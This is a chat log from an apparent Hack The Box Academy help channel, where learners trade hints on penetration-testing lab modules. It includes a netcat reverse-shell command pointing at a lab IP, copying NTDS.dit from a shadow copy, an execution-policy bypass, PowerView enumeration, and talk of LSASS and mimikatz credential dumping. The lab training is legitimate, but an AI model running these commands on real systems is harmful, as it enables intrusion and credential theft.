#modules

the skills assessment for digital forensics is not what i expected it to be

Hello, I was performing the Service Authentication Brute Forcing module on a task (FTP Brute Forcing). In the example, it shows (tcp 0 0 127.0.0.1:21), but in mine, it appears as (tcp 0 0 0.0.0.0:80) when I used (netstat -antp | grep -i list). Why did this happen? *I solve the task, but I didn't understand why I should use 127.0.0.1.

127 is localhost/loopback, 0.0.0.0 is wildcard for all interfaces which may not always be ideal

Also that shows that all interfaces are listening on port 80, likely for web requests

Are you running that netstat on the target or on your attack machine

The pwnbox is listening on port 80 to serve you the vm in the browser

ahh

generally if something is running a listener on loopback, then it's either only internal to that machine OR it's acting as a bridge to another machine through port forwarding

https://academy.hackthebox.com/module/134/section/1219
i really need help with the skill assessment i enumerated users i found out how to find the user token but when trying to change the password of another user with his token im getting access denied

Hello! i am a newbie and doing the linux fundamentals. But i cant find the kernel version and what the network name is for MTU 1500. Im doing the commands and typing in the name/numbers but its worng'

first: you need to ssh to the target machine

then you need to run the commands for finding out info

so i cant do it in the virutal proxy?

no

how do i ssh into it? seems i cant do it from my pc

you need to connect to the vpn

or if using the pwnbox (in-browser vm) you can ssh using that

i am running the instance in the module

the targets are generally spawned on a private network range of 10.129.x.x that you normally don't have access to

instance =/= target btw, two separate things

care to explain?

the spawn instance spawns the pwnbox virtual machine

to spawn the target, you need to click the green text that says "Click here to spawn the target"

unless otherwise stated; things in the linux fundamentals course will require you to ssh to a target machine to answer questions

oh alr. so i download the vpn file then what?

if you're using the in-browser vm, you don't need the vpn file

you can use that to interact with the target

it's also recommended to do things from within a vm, so if you don't want to use the in-browser instance - you will need to set up your own

the Setting Up module will have information regarding setting up your own pentesting environment

^

The in browser seems easier atm before i get a grasp on linux

personal preferences and whatnot ¯_(ツ)_/¯

either way; the section should give you info on how to connect to a target

thanks i will check it out 😄 i might have turned off my instance gotta have to wait a day xD

generally above the first question it will instruct you to "SSH/RDP/Authenticate to <spawned IP> with username "username" and password "password""

this is why we suggest setting up your own vm

there's no restrictions on your own personal machine

is there any documentation on how i set up my own vm and connect it to HTB? as i said im very new and this is my first time trying linux

there's the "Setting up" module

https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm is the htb article re: installing parrot on a vm but you can use Kali if you want

the in-browser pwnbox uses parrotOS

Thank you! found it now

i've noticed the in-browser pwnbox and pwnbox iso are different, which sucks because i want those nice terminal colors

gotta spend an hour configuring my bash environment

Hi guys I feel very ftustrated because I'm working on the HTB password attack module (password mutation). I read forum, but I don't understand very well lol. I read something about a policy that allowed me to make mut_password.list shorter. Do you have any hint or advice ?

yes; because the htb-edition iso is not the pwnbox iso

you can likely copy the .bashrc file to emulate the terminal color schemes

it's not a policy it's literally just editing out the first 17k lines

the issue with that is it copies everything, so it copies the IP + server

it's not some special rule/policy to add to the rules file

does it?

i genuinely haven't dug too much into it

it has to display the IP and server on the bash prompt somehow

yes by using environment variables

it doesn't have those hard coded

at some point i'll look at it again and see if i can get the colors

there was a website for this kind of stuff

it's also likely a bit to do with the 'theme' color

Hello back with new question in my mind

Module: tcpdump fundamentals

How do i know if sequence numbers being used are absolute or relative ?

something like best64.rule right?

no

the mutated wordlist should ONLY be created using the custom.rule and password.list from the resources

Hi! I need a help, I'm studying web proxies, but when i try to start zap with firefox (I saved the certificate and i created the new proxy with foxy proxy) I loose connection! i think the problem is because i'm using a cg-nat, i also tried to use the ip of the server (The one that foxy show me), but i always loose connection (maybe firewall of the cg-nat internet provider)

using other rules will lead to an incorrect wordlist that may not include all the passwords to complete the module

ok, I'll try to think about it

btw thanks

np

so

i created mut_psw.list using custom.rules and psw.list but it's over 94k lines

i tried to make a vm with HTB parrot but when i start it after i installed it i get back in the terminal where i can choose to install it again

that is the correct output size from the command

you need to unmount the iso

or change the boot order to make the vdi/vhd boot first

oh thank u

ok nice, now any advice to go ahead?

just attack the right services or use the right hashcat modes depending on what you're doing

In the password atacks medium
I got a zip file cracked it using John got an office document and extracted a password hash from that
Cracked that now I was wondering how to open that .docx file to see contents inside it

??????

openoffice is a good tool

or any other document reader

Is it in the pwnbox

you might need to install it

Ohk

i tried hydra and crakmapexec with ssh protocol , but without results

don't attack ssh

there's other services running

ssh is painfully slow and the target will likely timeout before it actually hits the righ pw for sam

Usualy ftp has same password as ssh in some modules

Maybe Crack ftp with hydra and try the same password for ssh

always enumerate the target, some questions (especially in the password attacks module) give you an end goal and you have to work towards getting there

ok try ftp

keep in touch

Please need some help

what's the difference between absolute and relative sequence numbers

it just depends; https://opensource.com/article/18/10/introduction-tcpdump

absolute will be the first in the sequence; everything after is relative

i really need help with the web attack skill assessment i enumerated all the users i know how to find uid's of users and how to change a password of any users how do i progress from here?
i saw on the forums i need to find an admin user but i went though all the users and didnt find any role param or something like that on any of there request

I just read that absolute numbers are some random lengthy numbers used for sequencing whereas relative ones are numbered starting from the first packet so they are short . isn't this right ?

yes. now answer the question from the module

well thats what bugging me , it is saying the answer is incorrect.

well then break down what the question wants from you

it's likely asking based on x data what is y value

Thank you.

Can anyone provide help with the Password Attacks module, specifically the Pass-the-Hash chapter? I am stuck on connecting to DC01 shared folder for David and Julio. Any help is appreciated!

do you already have the hash?

got the hash dump from mimikatz, just struggling with what tool to connect to the share

share, sounds like SMB

windows though doesn't have a specific tool to connect to shares

I believe I need to pivot from the machine I RDP'd to (MS01) as it can see DC01 but when I try to target DC01 with mimikatz it says I am still on MS01 in the cmd that pops up

that's just a visual thing

you can, in-fact, interact with DC01

^ did you use the dir command?

the pth technique is launching a prompt in the context of the user you're impersonating

Is that instead of the cmd.exe?

Oh well I feel stupid now lol

he's referring to using dir to try and view the share

dir \\dc01\<user>

that has worked, thank you very much & thank you @soft cedar

hi, can i ask for help regarding a box

i get a strange error

no

this channel isn't for box related nudges

#boxes is; if you can't see it read #welcome and follow instructions

i realize that but i am not allowed to talk in most channels

read #welcome and follow instructions

it's not a difficult situation to overcome

thanks

i think i figured out the problem regardless

Hi everyone, sorry for writing but I need a little help. I'm in the form
Meterpreter Tunneling & Port Forwarding
I started an ssh tunnel with the target, in fact meterpreter works well. except that when I go to boot via metasploit
server/sock_proxy always gives me:
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 12.

[] Starting the SOCKS proxy server
[] Stopping the SOCKS proxy server
furthermore, wanting to answer the second question I have to use autoroute, which, configured as it says in the module, and done ''run'', tells me:
run

[-] Msf::OptionValidateError The following options failed to valid: SESSION
[*] Post module execution completed

Can anyone give me a hint?

https://tenor.com/view/stressed-stress-struggle-struggles-the-struggle-is-real-gif-4757075

in order to use autoroute you need to first initiate a session in metasploit

as it's a post-exploit tool

I already have it

are you exiting the session or closing it when you go to do autoroute

also for autoroute you need to specify the session

I haven't left or closed, everything is open now

follow the instructions from the module to a T

since it asks me for 172.16.5.19 should I change the subnet?

can you list the sessions

it looks like you have two separate msf things running, which is likely why things aren't working as you want them to

and here there is a problem, it tells me no active session

because you need to run this from the msfconsole that has your connection running

:) which is why it's all failing

follow the instructions explicitly to a T

I'm sorry, what do you mean by ''T''?

I have opened 3 metasploit sessions, so are you suggesting I do everything from a single metasploit session?

"follow X to a T" is a saying. it just means follow all the instructions provided carefully

^

yes

each metasploit session cannot see each other

hahaha LOL, not being an English native speaker I don't know these sayings, too bad

I'm telling you to read and follow the section directly

it tells you how to background the session to perform the tasks as required

Now I'm rereading everything very carefully

sorry to bother you, i tried ftp but it doesn't work. I'm gonna crash my pc😂

it will work

perhaps increasing the threads will help you

48 seems to be the most stable for many

are u sure that 94k it's the right file?

yes

it's the intended file to be created

you just gotta have patience

it takes ~ 20 minutes to get the password on 48 threads

ok,so I just wait

this module is a HUGE lesson in patience

In Hacking Wordpress - User Enumeration,

Q: From the last cURL command, what user name is assigned to User ID 2?

I found two users already other then admin but not working as answer.

Help!

I just broke devvortex lol

didn't check the code I tried to insert and there was a error, resets not being done right now.

it works!!!!!!!!!!!!

damn, no more resets for the day. this thing is broken now, sorry everybody

wrong place buddy

this channel is for assistance and discussion around htb academy modules

ah okay

#boxes for generally asking for hints/nudges with boxes

and if you really want to just message support and see if they can reset the box for you

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

thx

I still desperately need a clue CBBH people help me out 🙏

you mean the grep extract? I didnt find any username that stands out

that does not work like that i give it uid's from 1 to 100 and it gives me back usernames

there are only 100 users and they all look like general names

going though all of them manually will take me hours

have you tried uid 0?

just out of curiosity

yes

i did 😅

there is no username called admin or any mention of admin i searched more then once

fuck i found one

thanks for the advice it helped

finally got my vm to work xD whats the inode number and hints on how i can find it? cant remember if i read it somewhere

man ls might be useful for you to read

but also: you will need to connect to the target to be able to get the right answer

make sure you have the vpn running

yea I struggled with that for 2 hours

ig " ls block-size /var/backups/shadow.bak " is correct?

no

hmm

back to man ls

also before asking is "x" correct run it and see

you're in an isolated environment - worst that happens is it breaks and you need to restart it

Hi Everyone, i seem to have found a content fault in one of the modules in Linux Fundamentals. Can idea where i can flag this to?

i was typing it to remember, i was jsut typing when u said no xD

#858470491676737536

Thank you

again; do first ask later

ye

inode can be a form of an index

Thank you so much for helping a newbie:D Found it instandly when u said index 😄

So whats the difference

learning how to research information on your own is vital

yea i get that, everything is just new to me. sorry

You don't have to apologize. Everyone here started from scratch at some point.

Google is a valuable tool, even chatGPT can be useful for explaining concepts

Has anyone finished Abusing http misconfigurations?

idk probably

just ask your question and someone that's done it might be able to assist

Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application.

it generally helps others to help you by providing info on what you've done so far that isn't working

Hello colleagues, I have a question related to the cracking password with hashcat module Extract the hash from the attached 7-Zip file, crack the hash, and submit the value of the flag.txt file contained inside the archive.

What's the question? 🙂

https://dontasktoask.com

The module shows you how to use the tool

I have done what it tells me to do, unzip the file and extract the hash, at the time of decrypting the hash I get the answer but at the time of validating it I get the wrong answer

make sure you don't have any extra spaces or anything in your answer

But on hashcat the status is cracked

which means that it found the answer

using the given wordlist

@acoustic owl I don't understand what you are asking, I did everything described in the module and I got the result, I don't know what to write in the answer, I wrote all the target headers but I couldn't find it, can you give me a clue?

try to do the command but with --show in the end

Look in the output under ||Header Poisoning||

I had a read error because I was supposed to decrypt the hash and read a file flag.txt which is where the correct answer was, thanks anyway

@acoustic owl I found the answer thank you. But I don't understand what it means. X-F*******

This is a header field

hi

i have a doubt for a challenge

who is author for packed - reversing

#1204439923126575235 if you believe the challenge isn't behaving as you expect

Hi there I'm stuck in the broken authentication module, predictable reset token, I can't understand how the token is generated, I converted the time stamp date displayed in epoch milliseconds then append to htbuser string and hashed with md5 however the token is different from the one shown.. any idea on how is it build?

basically I did md5("htbuser" + str(epoch_ms))

there's a +/- 1 second variance

so you need to guess all 2000 possibilities

yeah I know but first I'm try to generate my own token to understand the algorithm

hey Xre0uS, on the DACL skill assessment i just ended up using mimikatz to grab jose's hash and complete the module. is that the way you were talking about yesterday?

yea it's just dumping lsass

second question? didn't it tell you to kerberoast

yeah unless you know the exact milisecond the token is generated, you won't get the same hash

you can use powerview or rubeus

mh, okay so I will try to directly found the admin one thanks

if you have a rev shell it will be easier since the given webshell is crap

lol he just said that

I don't think mimikatz does kerberoast

conptyshell

Hello I have a problem with this command can you help me please?

https://academy.hackthebox.com/module/67/section/628

"C:\Users\Administrator\Downloads\nc.exe -e cmd.exe 10.10.15.141 443 this?

yes

you can see in the error it's saying the path can't be found

no

it's saying explicitly that HKLM:\... can't be found

learn to read your errors my guy

I simply followed what the course laid out sorry

the example doesn't have HKLM:\

there is no :

that powershell is incorrect

the HKLM path doesn't use use : as it's not a network mapped drive

wth am i doing wrong?

well it looks like something is broken with the script

which is entirely an intended thing by the author as it's not a plug and play script from what I know

Usually course is good about mentioning things like that. From what i can tell it should be plug and play. looking at the code its self theres no metnion of foundeR_enum.sh anywhere. The line at 51 looks correct to me also but my coding is sup par at best

what's the link to the repo?

https://www.exploit-db.com/exploits/49821

any idea why the payload is not executing. I tried using pht and phpt too the results are the same when I check the source code I find opening quotes so I try to close it but the result stays the same. I even tried using the <script> tag. I tried using the simple php payload.
<?php system('ls'); ?>

thank you x3dnesse

Are you looking for this? https://github.com/dpgg101/GitLabUserEnum

I take it this is provided by the section?

correct "this one" is the link provided in course mat

and they also include the python link

use the python 3 one

😉

python3 worked for me np

i had tried it but had some issues with it as well so was trying to get primary to work. I'll give it another go
edit: worked w/o issue after re cloning it, i'll just use this one thx.

i wonder if the cp/paste is including the header info for the bash script

perhaps when you copy/pasted it some of the info got messed up

I downloaded then copied it over into another folder, had the issue so copy pasted it as well with same results.

what happens when you just run ./gitlab_user_enum.sh

also how did you download it would be the more precise question ig

right, that's what i was thinking. show the command you used to download it, and show the results of the python script not working

to clairfy py works fine, so using it. That being said i just clicked download link. and just running it w/o any arguments resuts in same error

because i threw the code into an online bash compiler and it runs the code just fine

it didn't throw any sort of error at me

redownloaded it via visting the link and clicking download button

So weirdly enough if i just copy/paste the raw and try to run it eliminates all the other bs but still error on line 51. but agian python works fine so its kinda moot point, but would like to figure out tf im doing wrong incase i have same issue later.

you'll need to know bash scripting to fix it. i think it's saying error with syntax on line 51

i had 0 issues running it

i copy/pasted the raw into a file and ran it just fine

yeah my guess is you didn't dl the raw file

the one from the download button is borked to heck tho

that's why i wanted to know the command he used to download it

hoenstly didnt know there was another way beside copy/paste raw or hitting DL button (for exploitDB at least)

wget <url to raw file>

any help on Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'. intro to assembly skill assement

#modules message 🙂

okay thank you , that's what I was trying to do but the shellcode , I got the same keys when I run the xor instruction

yea i'm trying to analyze the files and I literally see 0 difference between the file generated by the download button, and the one from raw

weird right lol

any pointers?

FIGURED IT OUT

the download button adds a carriage return which isn't getting parsed by bash

i always use the raw file heh

no idea what that means but ima look it up lol

it basically appends \r to all the lines

instead of new-line

vvvv

whereas the raw file just says it's ascii text

that's why the errors on those other lines weren't outputting anything because it was erroring out with a carriage return which your terminal interpreted as the 'enter'/whitespace

WhiteBox Attacks: Remote Code Execution I've completed this section's exercise. But, I feel like there is a waaaay better approach to exploit it. I'd like to discuss this with anyone that's already completed it.

solved the riddle of the fuckening; the download treats it as a CRLF file, which isn't handled correctly by linux systems

did you figure it out?

doing the skills assessment for pivot module.. how do i stop port forwarding on my attack host

You generally don't port forward on your host, you forward through the pivot

i did do a local port forward to scan the target network using proxychains for more victims

Again you don't generally forward on your host, you forward the request through the victim

so once I disconnect from my current target im not forwarding anymore?

Correct

any help why this is not working I fuzzed and tried almost all the extentions

gotcha okay makes sense why netstat -antp only works when im connected to my target

In order to forward traffic there needs to be a route

okay this is starting to make sense

this for sure has been the hardest model to comprehend.. feels like inception

Think about it like taking multiple trains. Train A gets you to the station that gets you to train B. Train B gets you to C... repeat until exhausted

i like that analogy better, my brain hurts less lol

At each stop you can "scan" the map of the Train system that you didn't see before

yeah.. yeah it definitely makes way more sense when you put it like that, thank you!

not yet

where are you stuck at

idk , if the loop I wrote is righ or not

there isn't much to it really, point RDX to the top of the stack, then xor the stack with the key which is in rbx, move the pointer by 8 every loop and loop 14 times

can I dm you ?

sure

Anyone able to provide insight on Attacking Tomcat CGI section? Following along with course im able to get to the welcome CGI page, however trying to append &set or &dir results in a 404 page

did you figured it out?

yo for cpts do you have to share screen? how they proctor dat shid

They don't proctor it from my understanding. You're allowed to use outside resources

I cannot connect to this spawned RDP server to save my life

You don't need to go there
Go to /manager
You will have a login page
Then you can use metasploit to do the rest

use ' ' for the password

Tried that earlier. Same result.

Wait I found a typo, nvm.

I recommend using remmina instead of xfreerdp

much better overall

Does it have a /drive: option like I usually do with xfreerdp?

uhm.... it's built on top of xfreerdp so im sure there's a way to configure it

but idk.

not a problem with xfreerdp

you can see the error there, it says login failure

idk what part you're on but remember not all users have rdp rights

i try to avoid metasploit at this time (partly for oscp prep, partly so i have a better understanding of whats actually happening)

youre missing one character in the url. look closely.

No issues go to the /manager
Then you will have move forward

the section is about Tomcat CGI, manager is a seperate thing

Anyone able to help? Getting an error trying to rdp into DEV01 on the Attacking Enterprise Networks - Lateral Movement section. - Timeout waiting for activation error -
/timeout:60000 works. Going to pop this in chat anyway in case it helps someone else

But @next bronze
@ember coral said attacking tomcat

Ok no issues 👍

Attacking Tomcat CGI section

Got it

Sorry @ember coral for the mistake

happened to me a lot , just refresh HTB page and try again

@ember coral I have dm you

Hi guys , I need a bit of guidance on the Public Exploits module, , the question says to identify services running on the given server but when I try to run nmap on it. I get an exception saying 'failed to resolve "Ip-Address" ' a little perplexed by this

Mmmm...
Tunneling is active??
If it's active then I think everything should work fine

Or just reset the IP and try again

you can dm me, ill give you a hand offline.

I've been stuck on this question in the active directory privilege access module "What other user in the domain has CanPSRemote rights to a host?"

Has anyone completed this module? lol

im on AD skills assessement I , still on the webshell , Q2, i can't import powerview , i did uploaded it but won't work

any hints on how to proceed

maybe im using wrong syntax to import it?

use a spoiler tag and show how you're importing it.

dm me, i can give you a hint offline if you need

||Import-Module -Name "C:\PowerView.ps1"||

since ||Import-Module .\Powerview.ps1|| didnt work either

seems to me you're not using the right folder. show the actual command and the result it gave.

generally things aren't stored in the root folder of the drive

how do you make a spoiler tag for image?

|| ||

anyways this is what i get

after that this error

try typing "Import-Module P" and then pressing tab

tried it but wont work either

oh looks like there's something wrong with the file

where did you get it from

Import-Module : The specified module 'PowerView.ps1' was not loaded because no valid module file was found in any
module directory.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

it looks like it's importing it successfully, but there's something wrong with the script and it spits out a bunch of errors

hmmm

yep there you go, wrong link

this is the correct file: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

you can't just copy the webpage, you have to download/copy the raw file

i'll try again with this new file

from the webshell?

look at your link and look at mine

your link is an actual website that contains the file in a code box

mine is the actual file within the code block

if you click on "raw" on your link, it'll take you to the actual file

that's the file you need to use

oooh you're right

thanks man , it worked now :3

guys when running a nmap scan with proxychains.. is there a flag or something i can give it so it only shows me successful or refused connections?

np

not sure mabe -vv?

but even after importing, i should use powerview commands in the directory where i imported that module no?

once you've imported the module into your session, it should stay there unless you close the powershell window and open another one

but i get errors when executing powerview command

its says command not recognized

show the command

||Get-DomainUser * -spn | select samaccountname||

did you import powerview

yes

just show the screen shot

this webshell sucks

looks ok, did you -ep bypass?

whats that lol

i'd have to go through it to see what it's doing so i'm not sure, i think that's the right command after a successful import

generally you need to set the execution policy bypass when doing stuff like that

did it work for you when you did this skill assessement?

i don't know what module you're on

Active Directory module

i haven't gone through that

on skills assessement I

oh i see

is there any method to get a rev shell back to my host from webshell?

yeah

type Set-ExecutionPolicy Bypass -Scope CurrentUser -Force

then import pv again just in case, and try again

alright

same problem

i'm sure the answer is in the module

i would go over that part again or something. but yeah if you have command access on the computer you can reverse shell easily

can i dm you?

ok

hey guys, i cant message #general rn what's going on

it says to check out #modules I don't understand

Anything wronng with this:

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

on network enumeration rright now.... trying to get the hostname of the target. i've tried -sV,-sn, -v -sn, and can't seem to find the hostname. Most nmap resullts never load/load indefinitely. Should I be looking somewhere else?

@shut wraith does C: \NTDS\ exist on ur machine?

I have coppied it successfully. But I have a new problem:

if I have the NTDS.dit file from a target machine but I don't have admin so I can't get the SYSTEM file in order to extract the info from NTDS using secretsdump then what do I do?

@shut wraith does your target have any exploits? have you googled/msf them? is gaining higher priviledge out off the picture?

i think you need admin rights to get ntds.nit, don't you?

If I find exploits such as maybe by using mimikatz then I get admin then what is the use in extracting info from NTDS if I already have admin

transfer it to your attack host

?

you need admin to get ntds.dit... then you say you can't get system because you don't have admin? it doesn't make sense

Okay I transfered it but now what?

nvm you still need the SYSTEM file

you probably have admin rights since you got ntds.dit btw , why can't you get the system file

im stuck on the pivoting skill assesment. i got to into the first ||windows server|| where you have to grab the ||lsass dump|| but i cant figure out how to move it from the target host to my attack host. ||i even tried to remote dump it with lsassy and nothing happens||. im assuming its because since im using a pivot host to it, it can see my attack host ip..

THanks

you can move it with /drive parameter when using xfreerdp

xfreerdp /v:[ip] /u:[user] /p:[pass] /drive:/path/to/whatever

i didnt even know that was a thing

then check the file explorer , you should have a new drive

let me try

then copy paste should work to transfer whatever

that worked, very useful, thanks!

hello I am new here, I know some basics about hacking is there anyone who can help me to improve myself

Np

I suggest following a job role path in HTB academy its 7€/month if you ate a student and you have access to almost every beginner/intermediate level modules

If you are new to hacking i’d also suggest to start with fundamentals, i guess there is a module or path covering fundamentals before diving into a job role path

you can do the Information Security Foundations skill path for penetration testing or the SOC Analyst Prerequisites skill path for security analysis

help please
Module: Windows Privilege Escalation
Section: Interacting with users

Question: Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

I've set up responder with the scf file placed in the C:\users\public\Downloads\ but I am only able to get hashes from htb-student. I am not getting any hashes from SCCM_SVC

did the module go over coercion?

on the linux fundamentals module, in the working with web services I started a http server without the use of npm in the startup command

yet the command I used to start it isn't the flag its looking for

any ideas on what to do?

what does the question say to do

i haven't done that module so i'm not sure what the goal there is

Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).

I need someone to learn the skill of hacking devices connected to the Wi-Fi network

but after installing the http server package through npm

well, it seems to want you to use npm

it's literally just

and you said you didn't.. so maybe try npm?

http-server

I did use npm to install the server

the command to start the server is just http-server -p8080

I can even see the get traffic

but it doesnt like the command I did

how did the module teach you to start it with npm

it didnt

did you try typing in your answer that starts with http-server?

yeah

-p is the short arg for port im 99% sure

@cloud urchin you can help learn the skill of hacking devices connected to the Wi-Fi network in kali linux my friend plz

can you show the whole command you typed in a pic

check the modules

This is after using npm to install the server package

there's a lot to learn, you should look at the modules on the website

Ok

that command works and is working right now

after npm it wants me to do php which it also doesnt show you how

it only ever shows you python3

How i can find it plz

htb academy

Tnx

from what i'm reading the question comes up because it's poorly worded, i sent you a dm rei

@cloud urchin What is the hacking tool for devices connected to Wi-Fi? Plz

stuck in pivot assesment. I found the next users creds so naturally im looking for the host to hop onto. I ran a ping sweep on powershell from the ||windows|| server. all the results come back as false..

Weird , there should be hosts alive

i can run it again, lets see if it does anything this time

You did || 1..254 | % {"172.16.6.$($): $(Test-Connection -count 1 -comp 172.16.6.$($) -quiet)"}||

Right?

Check for the ip you may have left .5 and forgot to change it to .6

shit your right, im looking at the ipconfig of that target host

i thought i saw .5 on both nic configs

ive been staring at the screen too long

You are almost there you got this

https://tenor.com/view/go-for-it-you-can-do-it-encourage-do-it-gif-14006408

damn they're all still coming back as false

this is what i ran ||1..254 | % {"172.16.6.$($): $(Test-Connection -count 1 -comp 172.15.6.$($) -quiet)"}||

ran the CMD ver and i got a hit

finally!

On Skills Assessment - File Upload Attacks i found the upload path, i found the extension, but when i try to access it i receive 404. I tried with a jpeg file and still 404. Is there a problem with the machine?

i highly doubt it. every time i thought that there was another answer. i would go over the module that covers that part and pay close attention, there's usually some key piece of information in there.

Has anyone been completing a box in the skill assessment and broken it? I somehow broke the box twice after obtaining a reverse shell and I couldnt use and basic commands like sudo, id, whoami or anything

use any*

there's many skill assessments and many modules

gonna have to be a little less vague my guy

what kind of shell was it, not all are stable

I just mean any box. This isnt the first time or first box. But Im currently on nibbles(priv esc) and i used the meterpreter vulnerability to obtain access

the getting-started nibbles box can sometimes be tricky

yeah meterpreter has staged and non-staged payloads, not all are stable. best to pivot to another process and obtain a stable shell.

just follow the guided instructions for the most part and you'll be fine

it was going well until basic commands stopped working. I was trying to use sudo to run a program and it said sudo command not found even though I used it a few minutes earlier to see what sudo commands I had access too

were you in the shell

yes

screenshot?

I think I should just take the private ssh key and go in that way instead of meterpreter

generally that's the smarter idea

Thank you

you just saying things aren't working doesn't really help us, if you provide screenshots it's easier for us to point out where your mistake may be

the guided portion guides you through doing it without msfconsole

I didnt have a chance to. I reset the box twice and didnt have it open when you asked for a ss. If it happens again or anything I can take one though

i am stuck at xss phishing when i tried attack on my self all are good but when i give url to victim it shows invalid url so what i do next???

@everyone

that's disabled

also trying to ping everyone in a huge server is just a dick move

just be patient

i tried this task from yesterday but no help

@fathom pendant It happened again and I have screenshots. I just spawned in a new instance and target to have everything reset and immediately set up the shell because I knew all the information I needed

shell

this is what I meant by dropping into your shell

You can use the help command to uncover the supported commands in the reverse shell session you established

you have a session; but you're not in the shell

I appreciate you so much. Thank you

In AD skill assessment II when we ran bloodhound through linux host , it didnt show all user/ info . But when we collect info from the MS01 machine . using same ldapp password we got the results. Why does this difference?

Different results from different machines.

xss isue in sending url can anyone help???

Its is the same set sam lab , maybe different perms but not sure what

try changing your approach

you say it's telling you invalid url. are you including the index page in your phishing attempt

iyes

Module : AD Enum & Attack (Skill Assessment I)
Question : How did you guys found the tp***y clear text password? I tried with hashcat -m 1000 since it is NTLM Hash and used rockyou.txt and other secLists wordlist still can't crack the hash

HInt lsa*

I got the ntlm hash of the user ady using sekurlsa::ekeys / sekurlsa::loggedonPasswords

sometimes passwords can't be cracked

@rustic sage thanks for your good response i now solved it using htb pawnbox but the things that i apply on pawnbox are the same that i apply on my local machine but it did not work its only work in htb pawnbox

then you are likely missing a crucial part; even if you copy/paste there may be some things that you're missing to do in your local machine

@fathom pendant i copy the payload from my liunx history and use it in pawnbox and it works and allso explore the htb forms there some write about pawnbox so i try in pawnbox and it works

¯_(ツ)_/¯

well the question here is asking for the user's clear text password, so i don't think the "passwords can't be cracked" would be useful no offense.

there's more than one way to obtain cleartext credentials

someone earlier suggested ls*

hes trying to tell you to look somewhere else

noted , I'll try harder but fyi tried lsadump, secrets and wdigest for cleartext password no use (mimikatz tool)

lmao finally got it, dump was right just need to edit something in the registry lol

Sorry, it was my fault. I forgot to edit sysmon config file so that it logs ImageLoad.

just this gave me an idea. What if you included characters like what hashcat and other software use to define the patterns. Or somehow engneered it so that it would be impossible to define in the usual software

that's not how it works

by unable to be cracked; i simply mean that it's not in the common wordlists we'd use

yeah but you could make a literal impossible to crack password for a specific software if it's not possible to define the pattern

or make it so difficult to define the pattern with tons of backslashe

except most hashes have a predefined signature that identifies them

you also don't generate the hashes yourself

an algorithm generates the hashes

well I have. but its not like im doing this on the daily.

again for the purposes of everyday/common situations: you aren't generating your own hashes out of thin air

you are using an algorithm that uses predefined methods

wait... isnt that an identical problem though? you define a pattern that defines a pattern

its just a matter of syntax

either way; most hashes have a predefined key identifier

this is referring PURELY to password hashes

not base64 or hex obfuscation

yeah. would be pretty interesting to make a website that javascript checks so that your password is not in the common patterns they guess

would make your password like +100 points stronger

again it's not a common pattern my dude

I mean like in a register form

it's a common set of words

and phrases

the patterns are usually combination of wordlists + brute force

there's also haveibeenpwned

so like Panda123 will get cracked

and any variation of it

as long as it's following the provided ruleset governed by the site

certain characters are blacklisted in password creation

but you could design a systme that knows it will not usually check for 2nd upper case so PAnda123 might never get cracked even though its same lenght/difficulty

except that's not how a tool like hashcat works lmao

it literally is

i'm not gonna argue this with you

its because you misunderstand what I'm saying lol

likely we're both not understanding each other

I'm saying you take the default rulesets, and now you create all your passwords so that they dont fall in those

so they will not get cracked

except there's dozens of rulesets that you'd have to account for

this conversation is veering far off-topic

aye. just interesting idea I had. will probably implement some time. later

and someone can always create their own ruleset that basically invalidates your tool

yes but your not supposed to have 100% fool proof. 99.999999999% is good enough

that's assuming a lot

the most you can hope for in any software solution like that is 80%

there's more efficient rulesets that get more matches. so it naturally gravitates to the same ones. there's not much point in very specialized ones (for english)=

either way

not relevant to the channel

Hello what about colleagues I want to know where I can practice more about the Hashcat module Cracking password with hascat is that I see that it is a very important topic and there is no miscellany of exercises as more robust to be able to test concepts.

password attacks uses hashcat a fair bit

unforunately, while i understand what you mean, it isn't nearly as effective as you would expect

say hashcat 3 times and chick3nman appears 😄

haha

do you want to discus on other channel? (i cant join #general yet) i'd really like to hear your take

is there an off topic somewhere you can access?

reading and following#welcome allows you to access more channels

i just heard about hackbox thing. I was 99% completed the register but my computer broke xD gotta do again

the only channels available for non-linked accounts are the academy channels, the active ctf channel, and the community help channel afaik

so i dont even have account for it

lets make new thread

hmmm, ok, wasnt aware of that

jajajajaj

threads aren't enabled in this server

easily abused feature

Am doing the skill assessment for the login brute force and the my machine keep timing out before the brute force is over. 😦 .
i reallly feel like cheating for this exercice.

I see that in the module they talk about a little bit of everything but there are no exercises to do to practice the topics with several exercises but only those that they have as such in the questions and in the last section

well.. in short, why do you think it wouldn't be as effective? Im thinking almost all password cracks are done in bunch with some sort of default settings (site rules permitting)

Well, you can cheat but if you do that, study why the execution of the command sometimes happens to me that when I can't and I don't understand the subject, I try to find the reason for the answer seems effective to me

cheating only hurts yourself; try and find out what's failing

are you trying to brute force a service that's painfully slow

is your username/password list just bad

did you skip a step that was taught earlier in the module?

Out of the box "run rockyou w/ onerule" style attacks will certainly have gaps, and you are right to assume that you could craft passwords to avoid them and even avoid many other "common" wordlists or rules or even combinations thereof. But that's an extremely limited attack scope compared to what is both possible and even what is in "common" use. This concept of crafting passwords that avoid common attack is actually something I like to do from time to time to mess with other crackers, as a bit of a friendly challenge. I will craft a very simple looking password, short and common root and minimal modifications that will be rather difficult to crack with attacks like that to highlight those sorts of gaps. But pretty much every one gets cracked eventually. It may be minutes or perhaps even as much as hours after, but almost never more than that. The "evolution" of attacks, especially for experience crackers will eventually cover so much ground that intentionally avoiding it is incredibly difficult(sorta).

I meant to take it a step further and enforce such passwords on a web service. So the JS checks that the rule set will not catch it. Instead of arbitrary rules

With rule stacking, random rule generation, guided rule generation, a huge number of wordlist generation and assembly schemes, etc., you will never avoid everything with a hand crafted scheme like that

then you're breaking out of password cracking

and moving to bruteforcing

